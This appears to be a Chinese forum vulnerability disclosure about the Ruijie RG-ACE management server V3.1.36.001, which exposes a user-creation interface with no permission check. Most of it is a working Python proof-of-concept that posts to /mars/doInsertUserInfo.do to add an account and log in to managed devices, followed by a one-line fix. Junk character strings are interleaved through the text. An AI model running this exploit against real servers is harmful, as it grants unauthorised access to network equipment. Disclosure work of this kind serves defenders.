锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

" ^1 ?+ t  y7 @4 I
8 L& b1 W0 C2 Z, d- Y测试的具体版本是
# {" @# [9 M8 I& `- C产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
+ o5 c& y8 A* A. a" ^; F* p编译时间: 201104291730
6 [5 i. y& ]+ u8 S, ~
+ a, M$ W2 [- x) v, k9 w! |) Q
% P& q& X. l) w' \8 }漏洞证明：
& @. W  P. g& \. _7 P
# n' L) c2 J! ~8 r& [




执行脚本
! P( Y- C6 `% F; Q6 L/ Q$ N#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
/ h& A* v/ V$ d, F/ furl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
( K$ L4 L! N! F* q4 E% gopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
, F0 W1 R  ?' v+ S% q8 spost=(("event","userManager.doInsertUserInfo"),
* h, \% H- w4 [) i("useractionname","addButtonValue"),
3 C  D0 V) B3 l1 e" ]0 o("useropermanager","userManager"),
4 k2 e7 s! ^' B. R0 W("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
% m9 \2 `  z& H: [4 `" H/ k- \("email",""),
! q: K# S9 e# Z("mobilePhone",""),
("officePhone",""),
3 t9 F% f& s$ l* i8 I$ k9 l4 S1 G("addr",""),
! _! U7 c* X8 f$ y4 G("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
& m. V9 X6 N0 f% H# @- A# cprint "Done"

1 B% @/ K7 c9 e4 E" [登录，连接设备
7 j) T- O+ N: k! |0 }1 q* m; |% x
2 g# X7 W0 e# \; ]9 Q, S) |
. }! n  j6 ^/ r

9 z2 p3 s8 \' h: g4 b
默认的管理员admin权限更大点

: d" F* F' x1 E' z
) z2 d/ L8 S$ F/ y0 R
  M" M. p/ n/ o9 h; K" e: J0 u/ _+ i

# Q$ ^9 @5 a7 S1 o  M3 I6 {2 K3 j! u; S: e修复方案：
加强对接口的权限验证